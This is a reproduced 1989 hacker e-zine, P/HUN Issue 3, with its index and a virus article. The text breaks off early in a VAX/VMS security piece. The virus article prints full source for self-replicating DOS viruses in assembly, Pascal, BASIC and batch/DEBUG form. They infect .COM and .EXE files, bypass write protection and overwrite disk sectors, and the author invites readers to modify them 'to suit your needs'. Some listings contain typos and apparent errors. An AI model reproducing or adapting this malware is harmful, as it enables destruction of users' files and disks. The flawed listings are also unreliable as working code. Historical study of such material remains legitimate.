home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / misc / phun3.phk < prev    next >
Text File  |  1990-04-07  |  261KB  |  5,921 lines

  1.  
  2.  
  3. ()---------------------------------------------------------------------------()
  4.                                 
  5.                           * = % = % = % = % = % = *                       
  6.                       ----=                       =----              
  7.                    -------%     P H U N   ]I[     %-------                  
  8.                       ----=                       =----                
  9.                           * = % = % = % = % = % = *                      
  10.  
  11.  
  12.   P/HUN Issue #3, Volume 2                      Articles [10] + Introduction
  13.   Release : February 11th 1989                  Comments: New - Vol 2   
  14.       
  15.  
  16.                            ==P/HUN Magazine Inc.==             
  17.      
  18.                    @ The Hacker's Den Bulletin Board System      
  19.           [ Home of P/HUN Online Magazine  &  2600 Magazine BBS #5 ]          
  20.                   (718)358/9209 :: 300/1200 Baud :: Open 24 Hrs 
  21.                          
  22.                                Proudly presents...
  23. [more]       
  24.                                P/HUN Issue III
  25.                                --------------- 
  26.                    P/HUN Issue 3, Volume 2: Phile 1 of 11
  27.  
  28.  
  29.                              Introduction & Index
  30.                              --------------------
  31.  
  32.  Welcome to P/HUN (fun) Issue III. A new volume for the New Year. We still 
  33.  remember some people often ridiculed and thought that P/HUN Newsletter would 
  34.  stop producing after the first or the second issue. Looks like that fraction
  35.  underestimated us severly.
  36.  
  37.  I would also like to say this, P/HUN was started with one highly noble   
  38.  thought in mind i.e. to spread knowledge that we individually or collectively
  39.  acquire through various resources. The intent has and will never be to 
  40.  degrade other highly esteemed newsletters or compete with them in anyway.
  41.  The idea is to co-exist symbiotically for the good of the readers, in mutual 
  42.  respect and assistance of each other. 
  43.    
  44. [more]        We at P/HUN Inc. are very pleased that people enjoyed our last issue.
  45.  We received many calls from all over the U.S commenting about Mr. Slippery's 
  46.  "Guide to PICK Operating System" and The Mentor's "Beginners Hacking Guide". 
  47.  We at P/HUN Inc. would like to thank both of them for their great 
  48.  contributions and hope hear more from them in future.
  49.  
  50.  We are still looking for someone experienced enough to write various news and
  51.  happenings that occur in the Phreak/Hack community. I thank all that applied,
  52.  but we really didn't find anyone properly qualified.   
  53.  
  54.  A lot of hard work and effort has gone into making this issue possible. Yes
  55.  the size of this issue is record breaking. We hope you find it intresting.
  56.  
  57.  If you have any comments, suggestion or would like to submit to our ever     
  58.  growing newsletter, contact us at The Hacker's Den. If we find your article 
  59.  intresting we will gladly publish it. Remember to only send us "original" &
  60.  "unreleased" stuff. There will be no exceptions. Although this issue contains
  61.  an article by Capt. Zap which has already been released. This file was a major
  62.  exeception due to the fact that we found it very intresting.
  63.  
  64.  P/HUN Issues can be obtained from one of the sponsor boards listed below:
  65. [more]       
  66.  The Phoenix Project - 512-441/3088 [Official Phrack & LOD/H TJ! release point]
  67.  The Central Office - 914-234/3260 [2600 Bulletin Board System #2]
  68.  
  69.  Here it is P/HUN Online Magazine Issue #3...Enjoy! 
  70.  
  71.                                                     Red Knight & DareDevil
  72.                                                   SysOps of The Hacker's Den
  73.                                               @ P/HUN Magazine Inc. / TSAN 89!
  74.  
  75. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  76.  
  77.    *-------------------*
  78.  -=| Table of Contents |=-
  79.    *-------------------*
  80.  
  81. No.    Phile Description                             Author            Size
  82. ---    ----------------------------------------      ------            ----    
  83. #1 -   Introduction & Table of Contents              Red Knight        3K
  84. #2  -  Viruses: Assembly, Pascal, Basic & Batch      Tesla Coil ][     24K
  85. #3  -  VAX/VMS System Security                       Lawrence Xavier   18K
  86. [more]       #4  -  AUtomated VOice Network(AUTOVON): An Outline  DareDevil         26K
  87. #5  -  The Pan Am Airline Computer Part "A"          Red Knight        47K
  88. #6  -  The Pan Am Airline Computer Part "B"          Red Knight        26K
  89. #7  -  Common Channel (I) Signalling:An overview     Tubular Phreak    18K
  90. #8  -  Who's Listening *                             Capt. Zap         58K
  91. #9  -  An Introduction to BITNET                     Aristotle         10K
  92. #10 -  Plastic Card Encoding Practices & Standards   Hasan Ali         6K
  93. #11 -  Lockpicking: An Indepth Guide                 The LockSmith     14K
  94.  
  95. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  96. =                 P/HUN Issue #3, Volume 2: Phile #2 of 11                    =
  97. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  98.  
  99.                  Viruses: Assembly, Pascal, Basic & Batch
  100.                  ----------------------------------------
  101.                           By  Tesla Coil ][
  102.  
  103.  
  104. [ I do not take any responsibility for any damages that may occur when  ]
  105. [ compiling viruses in this article. This article has been written to   ]
  106. [ promote knowledge into the amazing world of computer viruses.         ]
  107. [more]       
  108. Viruses can be written in practically every computer language known today. 
  109. Although most effective viruses have been written in Assembly. 
  110.  
  111. Many of us think that viruses cannot be written in Basic due to its limited  
  112. ability. This is untrue. Basic has the capability of producing very effective
  113. viruses if properly used. Combining assembly and basic could futher enhance 
  114. the effectiveness of the virus.
  115.  
  116. In this article we will examine some viruses written in Assembly, Pascal, Basic
  117. and Batch written by B. Fix, R. Burger and M. Vallen which proved to be very 
  118. intresting to me.
  119.  
  120. Please use some caution handling these virus programs. Please use a separate
  121. disks when you wish to compile.
  122.  
  123.                         Virus in Assembly Language 
  124.                         -------------------------- 
  125.  
  126. Most viruses out there have been written in assembly because assembly has the
  127. unique ability to bypass operating system security.
  128. [more]       Here is an example of a virus written under MS-DOS 2.1 and can obviously be
  129. compiled in the later versions. The article contains remarks so as to further
  130. explain the parts. Programmers may wish to delete those segments if desired.
  131.  
  132. ***************************************************
  133. ;   Program Virus        
  134. ;   Version 1.1
  135. ;   Writter : R. Burger
  136. ;   Created 1986
  137. ;   This is a demonstration program for computer 
  138. ;   viruses. It has the ability to replace itself.
  139. ;   and thereby modify other programs. Enjoy.
  140. ;**************************************************
  141.  
  142. Code   Segment
  143.        Assume  CS:Code
  144. progr  equ 100h
  145.        ORG progr
  146.  
  147. ;**************************************************
  148. ;   The three NOP's serve as the marker byte of the  
  149. [more]       ;   virus which allow it to identify a virus.
  150. ;**************************************************
  151.  
  152. MAIN:
  153.        nop
  154.        nop
  155.        nop
  156.  
  157. ;**************************************************
  158. ;   Initialize the pointers
  159. ;**************************************************
  160.  
  161.        mov ax,00
  162.        mov es:[pointer],ax
  163.        mov es:[counter],ax
  164.        mov es:[disks],al
  165.  
  166. ;**************************************************
  167. ;   Get the selected drive
  168. ;**************************************************
  169.  
  170. [more]              mov ah,19h             ;drive?
  171.        int 21h    
  172.  
  173. ;**************************************************
  174. ;   Get the current path on the current drive
  175. ;**************************************************
  176.  
  177.        mov cs:drive,al        ;save drive
  178.        mov ah,47h             ;dir?
  179.        mov dh,0               
  180.        add al,1
  181.        mov dl,al              ;in actual drive
  182.        lea si,cs:old_path     ;
  183.        int 21h
  184.  
  185. ;**************************************************
  186. ;   Get the number of drives present. If only one   
  187. ;   is present, the pointer for the search order
  188. ;   will be set to serach order + 6
  189. ;**************************************************
  190.  
  191. [more]              mov as,0eh             ;how many disks 
  192.        mov dl,0               ;
  193.        int 21h
  194.  
  195.        mov al,01
  196.        cmp al,01              ;one drive
  197.        jnz hups3
  198.        mov al,06
  199.        
  200. hups3: mov ah,0
  201.        lea bx,search_order
  202.        add bx,ax
  203.        add bx,0001h
  204.        mov cs:pointer,bx
  205.        clc
  206.  
  207. ;**************************************************
  208. ;   Carry is set, if no more .COM's are found.      
  209. ;   Then, to avoid unnecessary work, .EXE files will
  210. ;   be renamed to .COM files and infected.
  211. ;   This causes the error message "Program to large
  212. [more]       ;   to fit memory" when starting larger infected
  213. ;   EXE programs.
  214. ;*************************************************
  215.  
  216. change_disk:
  217.       jnc no_name_change
  218.       mov ah,17h              ;change .EXE to .COM
  219.       lea dx,cs:maske_exe
  220.       int 21h
  221.       cmp al,0ffh
  222.       jnz no_name_change      ;.EXE found?
  223.  
  224. ;****************************************************
  225. ;   If neither  .COM nor .EXE is found then sectors
  226. ;   will be overwritten depending on the system time
  227. ;   in milliseconds. This is the time of the complete
  228. ;   "infection" of a storage medium. The virus can
  229. ;   find nothing more to infect and starts its destruction
  230. ;*****************************************************   
  231.  
  232.       mov ah,2ch              ; read system clock
  233. [more]             int 21h
  234.       mov bx,cs:pointer
  235.       mov al,cs:[bx]
  236.       mov bx,dx
  237.       mov cx,2
  238.       mov dh,0
  239.       int 26h                 ; write crap on disk
  240.  
  241. ;******************************************************
  242. ;   Check if the end of the search order table has been
  243. ;   reached . If so, end.
  244. ;******************************************************
  245.  
  246. no_name_change:
  247.       mov bx,cs:pointer
  248.       dec bx
  249.       mov cs:pointer,bx
  250.       mov dl,cs:[bx]
  251.       cmp dl,0ffh
  252.       jnz hups2
  253.       jmp hops
  254. [more]             
  255. ;****************************************************
  256. ;   Get new drive from the search order table and
  257. ;   select it .
  258. ;***************************************************
  259.  
  260. hups2:
  261.       mov ah,0eh
  262.       int 21h                    ;change disk
  263.  
  264. ;***************************************************
  265. ;   Start in the root directory
  266. ;***************************************************  
  267.  
  268.       mov ah,3bh                 ;change path
  269.       lea dx,path
  270.       int 21h
  271.       jmp find_first_file
  272.  
  273. ;**************************************************
  274. ;   Starting from the root, search for the first
  275. [more]       ;   subdir. FIrst convert all .EXE files to .COM
  276. ;   in the old directory
  277. ;**************************************************
  278.  
  279. find_first_subdir:
  280.       mov ah,17h                 ;change .exe to .com
  281.       lea dx,cs:maske_exe
  282.       int 21h
  283.       mov ah,3bh                 ;use root directory
  284.       lea dx,path
  285.       int 21h
  286.       mov ah,04eh                ;search for first subdirectory
  287.       mov cx,00010001b           ;dir mask
  288.       lea dx,maske_dir           ;
  289.       int 21h                    ;
  290.       jc change_disk
  291.       mov bx,CS:counter
  292.       INC,BX
  293.       DEC bx
  294.       jz  use_next_subdir
  295.  
  296. [more]       ;*************************************************
  297. ;   Search for the next subdirectory. If no more
  298. ;   directories are found, the drive will be changed.
  299. ;*************************************************
  300.  
  301. find_next_subdir:
  302.       mov ah,4fh               ; search for next subdir
  303.       int 21h 
  304.       jc change_disk
  305.       dec bx
  306.       jnz find_next_subdir
  307.  
  308. ;*************************************************
  309. ;   Select found directory.
  310. **************************************************
  311.  
  312. use_next_subdir:      
  313.       mov ah,2fh               ;get dta address
  314.       int 21h
  315.       add bx,1ch
  316.       mov es:[bx],'\`          ;address of name in dta
  317. [more]             inc bx
  318.       push ds
  319.       mov ax,es
  320.       mov ds,ax
  321.       mov dx,bx
  322.       mov ah,3bh               ;change path
  323.       int 21h
  324.       pop ds
  325.       mov bx,cs:counter
  326.       inc bx
  327.       mov CS:counter,bx
  328.  
  329. ;**************************************************
  330. ;    Find first .COM file in the current directory.
  331. ;    If there are none, search the next directory.
  332. ;**************************************************
  333.  
  334. find_first_file:
  335.       mov ah,04eh              ;Search for first
  336.       mov cx,00000001b         ;mask
  337.       lea dx,maske_com         ;
  338. [more]             int 21h                  ;
  339.       jc find_first_subdir
  340.       jmp check_if_ill
  341.  
  342. ;**************************************************
  343. ;   If program is ill(infected) then search for
  344. ;   another other.
  345. ;************************************************** 
  346.  
  347. find_next_file:
  348.       mov ah,4fh               ;search for next
  349.       int 21h
  350.       jc find_first_subdir
  351.  
  352. ;*************************************************
  353. ;   Check is already infected by virus.
  354. **************************************************
  355.  
  356. check_if_ill:
  357.       mov ah,3dh              ;open channel
  358.       mov al,02h              ;read/write
  359. [more]             mov dx,9eh              ;address of name in dta 
  360.       int 21
  361.       mov bx,ax               ;save channel
  362.       mov ah,3fh              ; read file
  363.       mov ch,buflen           ;
  364.       mov dx,buffer           ;write in buffer
  365.       int 21h 
  366.       mov ah,3eh              ;close file
  367.       int 21h  
  368.  
  369. ;***************************************************
  370. ;   This routine will search the three NOP's(no 
  371. ;   operation).If present there is already an infection.
  372. ;   We must then continue the search
  373. ;****************************************************
  374.  
  375.      mov bx,cs:[buffer]
  376.      cmp bx,9090h
  377.      jz find_next_file
  378.  
  379. ;***************************************************
  380. [more]       ;   This routine will BY PASS MS-DOS WRITE PROTECTION
  381. ;   if present. Very important !
  382. ;***************************************************
  383.  
  384.      mov ah,43h               ;write enable
  385.      mov al,0          
  386.      mov dx,9eh               ;address of name in dta
  387.      int 21h 
  388.      mov ah,43h
  389.      mov al,01h
  390.      and cx,11111110b
  391.      int 21h
  392.  
  393. ;****************************************************
  394. ;   Open file for read/write access.
  395. *****************************************************
  396.  
  397.      mov ah,3dh               ;open channel
  398.      mov al,02h               ;read/write
  399.      mov dx,9eh               ;address of name in dta
  400.      int 21h
  401. [more]       
  402. ;****************************************************
  403. ;   Read date entry of program and save for future
  404. ;   use.
  405. ;****************************************************
  406.  
  407.     mov bx,ax                ;channel
  408.     mov ah,57h               ;get date
  409.     mov al.0
  410.     int 21h
  411.     push cx                  ;save date
  412.     push dx 
  413.  
  414. ;****************************************************
  415. ;   The jump located at address 0100h of the program
  416. ;   will be saved for further use.
  417. *****************************************************
  418.  
  419.     mov dx,cs:[conta]        ;save old jmp
  420.     mov cs:[jmpbuf],dx
  421.     mov dx,cs:[buffer+1]     ;save new jump
  422. [more]           lea cx,cont-100h
  423.     sub dx,cx
  424.     mov cs:[conta],dx
  425.  
  426. ;***************************************************** 
  427. ;   The virus copies itself to the start of the file. 
  428. ;***************************************************** 
  429.  
  430.     mov ah,57h               ;write date
  431.     mov al,1         
  432.     pop dx
  433.     pop cx                   ;restore date
  434.     int 21h
  435.  
  436. ;*****************************************************
  437. ;   Close the file.
  438. ;*****************************************************
  439.  
  440.     mov ah,3eh               ;close file
  441.     int 21h
  442.  
  443. [more]       ;*****************************************************
  444. ;   Restore the old jump address. The virus saves at
  445. ;   address "conta" the jump which was at the start of
  446. ;   the host program.
  447. ;   This is done to preserve the executability of the
  448. ;   host program as much as possible.
  449. ;   After saving it still works with the jump address
  450. ;   contained in the virus. The jump address in the 
  451. ;   virus differs from the jump address in memory.
  452. ;****************************************************
  453.  
  454.     mov dx,cs:[jmpbuf]       ;restore old jump
  455.     mov cs:[conta],dx
  456. hops:  nop
  457.        call use_old
  458.  
  459. ;****************************************************
  460. ;   Continue with the host program.
  461. ;****************************************************
  462.     
  463. cont    db 0e9h                ;make jump
  464. [more]       conta   dw 0
  465.         mov ah,00
  466.         int 21h    
  467.  
  468. ;***************************************************
  469. ;   Reactivate the selected drive at the start of  
  470. ;   the program.
  471. ;***************************************************
  472.  
  473. use_old:
  474.         mov ah,0eh             ;use old drive
  475.         mov dl,cs:drive 
  476.         int 21h 
  477.  
  478. ;*************************************************** 
  479. ;    Reactivate the selected path at the start of
  480. ;    the program.
  481. ;***************************************************
  482.  
  483.         mov ah,3bh             ;use old drive
  484.         lea dx,old_path-1      ;get old path and backslash
  485. [more]               int 21h
  486.         ret
  487.  
  488. search_order db 0ffh,1,0,2,3,0ffh,00,offh
  489. pointer      dw   0000           ;pointer f. search order
  490. counter      dw   0000           ;counter f. nth. search 
  491. disks        db    0             ;number of disks
  492.  
  493. maske_com    db "*.com",00       ;search for com files
  494. maske_dir    db "*",00           ;search for dir's
  495. maske_exe    db offh,0,0,0,0,0,00111111b 
  496.              db 0,"????????exe",0,0,0,0
  497.              db 0,"????????com",0
  498. maske_all    db offh,0,0,0,0,0,00111111b
  499.              db 0,"???????????",0,0,0,0
  500.              db 0,"????????com",0
  501.  
  502. buffer equ 0e00h                 ;a safe place
  503.  
  504. buflen equ 230h                  ;lenght of virus!!!!
  505.                                  ;carefull
  506. [more]                                        ;if changing!!!!
  507. jmpbuf equ buffer+buflen         ;a safe place for jmp
  508. path  db "\",0                   ;first place
  509. drive db 0                       ;actual drive
  510. back_slash db "\"
  511. old_path db 32 dup (?)           ;old path
  512.  
  513. code ends
  514.  
  515. end main
  516.  
  517. [ END OF THIS VIRUS PROGRAM ]
  518.  
  519.  
  520.  
  521.                              Virus in Pascal         
  522.                              ---------------           
  523.  
  524.  
  525. Pascal is another high level language that can produce eye popping computer
  526. viruses. Especially when the usage of Turbo Pascal is involved. 
  527. [more]       The virus below was available through various bulletin boards for
  528. a while.    
  529.  
  530. {
  531. ------------------------------------------------------------------
  532. Number One
  533.  
  534.  
  535. Please handle this virus with care!!!!!!!!!!! [Deadly Demo]
  536.  
  537. Number One infects all .COM - file's name will be displayed 
  538. That file has been overwritten with Number Ones's program code and
  539. is not reconstructible! If all files are infected or or no .COM
  540. files are found, Number one gives you a <Smile>.
  541. Files may be protected against infections of Number One by
  542. setting the Read ONLY attribute.
  543.  
  544. Written 10.3.87 by M.Vallen (Turbo Pascal 3.01A)
  545.  
  546. ------------------------------------------------------ }           
  547. }
  548. [more]       
  549. {C-}
  550. {U-}
  551. {I-}       { Wont allow a user break, enable IO check}
  552.  
  553. { -- Constants --------------------------------------- }          
  554.  
  555. Const
  556.      VirusSize = 12027;    {Number One's code size}
  557.     
  558.      Warning   :String[42]    {Warning message}
  559.      = 'This file has been infected ny Number One!';
  560.  
  561. { -- Type declarations------------------------------------- }
  562.  
  563. Type
  564.      DTARec    =Record      {Data area for file search }
  565.      DOSnext  :Array[1..21] of Byte;
  566.                    Attr    : Byte;
  567.                    Ftime, 
  568.                    FDate,
  569. [more]                          FLsize, 
  570.                    FHsize  : Integer;
  571.                    FullName: Array[1..13] of Char;
  572.                  End;
  573.  
  574. Registers    = Record    {Register set used for file search }
  575.    Case Byte of
  576.    1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
  577.    2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte);
  578.    End;
  579.  
  580. { -- Variables--------------------------------------------- } 
  581.  
  582. Var
  583.                                { Memory offset program code }
  584.    ProgramStart : Byte absolute Cseg:$100;
  585.                                           { Infected marker }
  586.    MarkInfected : String[42] absolute Cseg:$180;
  587.    Reg          : Registers;                 { Register set }
  588.    DTA          : DTARec;                       { Data area }
  589.    Buffer       : Array[Byte] of Byte;        { Data buffer }
  590. [more]          TestID       : String[42]; { To recognize infected files }
  591.    UsePath      : String[66];        { Path to search files } 
  592.                                     { Lenght of search path }
  593.    UsePathLenght: Byte absolute UsePath;
  594.    Go           : File;                    { File to infect }
  595.    B            : Byte;                              { Used }
  596.  
  597. { -- Program code------------------------------------------ }
  598.  
  599. Begin
  600.   WriteLn(Warning);               { Display warning message }
  601.   GetDir(0, UsePath);               { get current directory } 
  602.   if Pos('\', UsePath) <> UsePathLenght then
  603.     UsePath := UsePath + '\';
  604.   UsePath := UsePath + '*.COM';        { Define search mask }
  605.   Reg.AH := $1A;                            { Set data area }
  606.   Reg.DS := Seg(DTA);
  607.   Reg.DX := Ofs(DTA);
  608.   MsDos(Reg);
  609.   UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
  610.   Reg.AH := $4E;
  611. [more]         Reg.DS := Seg(UsePath);
  612.   Reg.DX := Ofs(UsePath[1]);
  613.   Reg CX := $ff;          { Set attribute to find ALL files }
  614.   MsDos(Reg);                   { Find first matching entry }
  615.   IF not Odd(Reg.Flags) Then         { If a file found then }
  616.     Repeat
  617.       UsePath := DTA.FullName;
  618.       B := Pos(#0, UsePath);
  619.       If B > 0 then
  620.       Delete(UsePath, B, 255);             { Remove garbage }
  621.       Assign(Go, UsePath);
  622.       Reset(Go);
  623.       If IOresult = 0 Then          { If not IO error then }
  624.       Begin
  625.         BlockRead(Go, Buffer, 2);
  626.         Move(Buffer[$80], TestID, 43);     
  627.                       { Test if file already ill(Infected) }
  628.         If TestID <> Warning Then        { If not then ... }
  629.         Begin
  630.           Seek (Go, 0);
  631.                             { Mark file as infected and .. } 
  632. [more]                 MarkInfected := Warning;
  633.                                                { Infect it }
  634.           BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7);
  635.           Close(Go);
  636.                                   { Say what has been done }
  637.           WriteLn(UsePath + 'infected.');
  638.           Halt;                   {.. and halt the program }
  639.         End;
  640.         Close(Go);
  641.       End;
  642.         { The file has already been infected, search next. }
  643.       Reg.AH := $4F;
  644.       Reg.DS := Seg(DTA);
  645.       Reg.DX := Ofs(DTA);
  646.       MsDos(Reg);
  647.     {  ......................Until no more files are found }
  648.     Until Odd(Red.Flags);
  649.   Write(`<Smile>');                          {Give a smile }
  650. End.
  651.  
  652.  
  653. [more]       Although this is a primitive virus its effective.In this virus only the .COM
  654. files are infected. Its about 12K and it will change the date entry.       
  655.  
  656.  
  657.  
  658.                            Viruses in Basic
  659.                            ----------------
  660.  
  661.  
  662. Basic is great language and often people think of it as a limited language
  663. and will not be of any use in creating something like a virus. Well you are
  664. really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
  665. This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
  666. files.To do this you must compile the source code using a the Microsoft 
  667. Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
  668. the source code to place the lenght of the object program in the LENGHTVIR
  669. variable. BV3.EXE should be in the current directory, COMMAND.COM must be
  670. available, the LENGHTVIR variable must be set to the lenght of the linked      
  671. program and remember to use /e parameter when compiling.
  672.  
  673. 10 REM ** DEMO  
  674. [more]       20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
  675. 30 REM ** BASIC DOESNT SUCK 
  676. 40 REM ** NO KIDDING
  677. 50 ON ERROR GOTO 670
  678. 60 REM *** LENGHTVIR MUST BE SET **
  679. 70 REM *** TO THE LENGHT TO THE **
  680. 80 REM *** LINKED PROGRAM ***
  681. 90 LENGHTVIR=2641
  682. 100 VIRROOT$="BV3.EXE"
  683. 110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
  684. 130 SHELL "DIR *.EXE>INH"
  685. 140 REM ** OPEN "INH" FILE AND READ NAMES **
  686. 150 OPEN "R",1,"INH",32000 
  687. 160 GET #1,1
  688. 170 LINE INPUT#1,ORIGINAL$
  689. 180 LINE INPUT#1,ORIGINAL$
  690. 190 LINE INPUT#1,ORIGINAL$
  691. 200 LINE INPUT#1,ORIGINAL$  
  692. 210 ON ERROR GOT 670
  693. 220 CLOSE#2
  694. 230 F=1:LINE INPUT#1,ORIGINAL$
  695. [more]       240 REM ** "%" IS THE MARKER OF THE BV3
  696. 250 REM ** "%" IN THE NAME MEANS
  697. 260 REM  ** INFECTED COPY PRESENT 
  698. 270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
  699. 280 ORIGINAL$=MID$(ORIGINAL$,1,13)
  700. 290 EXTENSIONS$=MID$(ORIGINAL,9,13)
  701. 300 MID$(EXTENSIONS$,1,1)="."
  702. 310 REM *** CONCATENATE NAMES INTO FILENAMES **
  703. 320 F=F+1
  704. 330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN      
  705. GOTO 350
  706. 340 GOTO 320
  707. 350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
  708. 360 ON ERROR GOTO 210
  709. 365 TEST$=""
  710. 370 REM ++ OPEN FILE FOUND +++
  711. 380 OPEN "R",2,OROGINAL$,LENGHTVIR
  712. 390 IF LOF(2) < LENGHTVIR THEN GOTO 420
  713. 400 GET #2,2
  714. 410 LINE INPUT#1,TEST$
  715. 420 CLOSE#2
  716. [more]       431 REM ++ CHECK IF PROGRAM IS ILL ++   
  717. 440 REM ++ "%" AT THE END OF THE FILE MEANS..
  718. 450 REM ++ FILE IS ALREADY SICK ++
  719. 460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
  720. 470 CLOSE#1
  721. 480 ORIGINALS$=ORIGINAL$
  722. 490 MID$(ORIGINALS$,1,1)="%"
  723. 499 REM ++++ SANE "HEALTHY" PROGRAM ++++
  724. 510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$          
  725. 520 SHELL C$
  726. 530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
  727. 540 C$="COPY "+VIRROOT$+ORIGINAL$
  728. 550 SHELL C$
  729. 560 REM *** APPEND VIRUS MARKER ***
  730. 570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
  731. 580 WRITE#1,ORIGINALS$
  732. 590 CLOSE#1
  733. 630 REM ++ OUYPUT MESSAGE ++
  734. 640 PRINT "INFECTION IN " ;ORIGIANAL$; "  !! BE WARE !!"
  735. 650 SYSTEM
  736. 660 REM ** VIRUS ERROR MESSAGE 
  737. [more]       670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
  738. 680 END
  739.     
  740.  
  741. This basic virus will only attack .EXE files. After the execution you will 
  742. see a "INH" file which contains the directory, and the file %SORT.EXE.
  743. Programs which start with "%" are NOT infected ,they pose as back up copies.
  744.  
  745.  
  746.                             Batch Viruses 
  747.                             -------------
  748.  
  749.  
  750. Whoever thought that viruses could be in BATCH file.This virus which we        
  751. are about to see makes use of MS-DOS operating system. This BATCH virus
  752. uses DEBUG & EDLIN programs.
  753.  
  754. Name: VR.BAT
  755.  
  756. echo = off         ( Self explanatory)
  757. ctty nul           ( This is important. Console output is turned off)
  758. [more]       path c:\msdos      ( May differ on other systems )
  759. dir *.com/w>ind    ( The directory is written on "ind" ONLY name entries)      
  760. edlin ind<1        ( "Ind" is processed with EDLIN so only file names appear)
  761. debug ind<2        ( New batch program is created with debug)
  762. edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
  763. ctty con           ( Console interface is again assigned)
  764. name               ( Newly created NAME.BAT is called.
  765.  
  766.  
  767. In addition to file to this Batch file,there command files,here named 1,2,3
  768.  
  769. Here is the first command file:
  770. -------------------------------
  771. Name: 1
  772.  
  773. 1,4d               ( Here line 1-4 of the "IND" file are deleted )
  774. e                  ( Save file )
  775.  
  776. Here is the second command file:
  777. --------------------------------
  778. Name: 2
  779. [more]       
  780. m100,10b,f000      (First program name is moved to the F000H address to save)  
  781. e108 ".BAT"        (Extention of file name is changed to .BAT)
  782. m100,10b,f010      (File is saved again)
  783. e100"DEL "         (DEL command is written to address 100H)
  784. mf000,f00b,104     (Original file is written after this command)
  785. e10c 2e            (Period is placed in from of extension)
  786. e110 0d,0a         (Carrige return+ line feed)
  787. mf010,f020,11f     ( Modified file is moved to 11FH address from buffer area)
  788. e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
  789. e12b od,0a         (COPY command terminated with carriage return + lf)
  790. rxc                ( The CX register is ... )
  791. 2c                 ( set to 2CH)
  792. nname.bat          ( Name it NAME.BAT)
  793. w                  ( Write )
  794. q                  ( quit )
  795.  
  796.  
  797. The third command file must be printed as a hex dump because it contains
  798. 2 control characters (1Ah=Control Z) and this is not entirely printable.
  799.  
  800. [more]       Hex dump of the third command file:
  801. -----------------------------------
  802. Name: 3
  803.  
  804. 0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 
  805.        1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
  806. 0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
  807.        y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
  808. 0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
  809.        y  y  y  y     .  E  .  .  .  .  .  .  .  .  .
  810.  
  811.  
  812. In order for this virus to work VR.BAT should be in the root. This program only
  813. affects .COM files. 
  814.  
  815.                               End Note  
  816.                               -------- 
  817. All these viruses can be modified to suit your needs. If anyone has seen any
  818. intresting viruses please contact me at The Hacker's Den BBS.       
  819.  
  820. Suggested readings:
  821. [more]       
  822. Computer Viruses: A high Tech Disease by Abacus
  823. 2600 Magazine: Volume 5, Number 2
  824.  
  825. -TC][-
  826.  
  827. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  828. =                 P/HUN Issue #3, Volume 2: Phile #3 of 11                    =
  829. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  830.  
  831.                           VAX/VMS System Security
  832.                           =======================
  833.                 Written for P/HUN Inc.,P/HUN Online Magazine
  834.                 -------------------------------------------- 
  835.                              By  Lawrence Xavier
  836.                                January, 1989
  837.  
  838.  
  839. VAX/VMS may be the worlds best operating system. It certainly beats the
  840. pants off each and every IBM OS, and wins over Unix hands down. Native
  841. VAX/VMS security is rated higher (by the U.S. Government) than all IBM
  842. [more]       mainframe OSs, even after such security packages as RACF and Top Secret 
  843. are added to them. 
  844.  
  845. VMS is not without its foibles and kludges, however. For one thing,
  846. enabling all the security features of VMS is guaranteed to crash the
  847. system! For another, many of VMS's security features are  annoying to 
  848. set up, encouraging lazy system managers to put off doing so indefinitely. 
  849.  
  850. VMS got a bad reputation when young hackers were able to routinely break
  851. into many systems by using default accounts and passwords such as username
  852. SYSTEM with password MANAGER. This has all changed with VMS 4.7: in the
  853. upgrade procedure the installer is required to change passwords on these
  854. accounts or eliminate them entirely.
  855.  
  856. Let's go over some of the basic features of VMS security, then look at some
  857. common problems and loopholes. Once you know what the loopholes are you can
  858. take steps to close them on systems you manage and increase security.
  859.  
  860.  
  861. VMS Security Features
  862. =====================
  863. [more]       
  864. Logging In:
  865. -----------
  866. VAX/VMS systems have several types of protection that can be set up on
  867. logins. Logins can be restricted by time of day, day of the week, and by
  868. terminal ID. Logins can also be restricted by where they come from: Local,
  869. Remote, Dialup, etc. 
  870.  
  871.      Local    are logins on direct connect ports or DECservers.
  872.      Remote   are logins across DECnet.
  873.      Dialup   are logins across X.25 or on ports set with the DIALUP
  874.               characteristic. 
  875.  
  876. Usually VMS will present a
  877.      Username:
  878. prompt after it sees one or two <CR> characters (which are used by VMS to
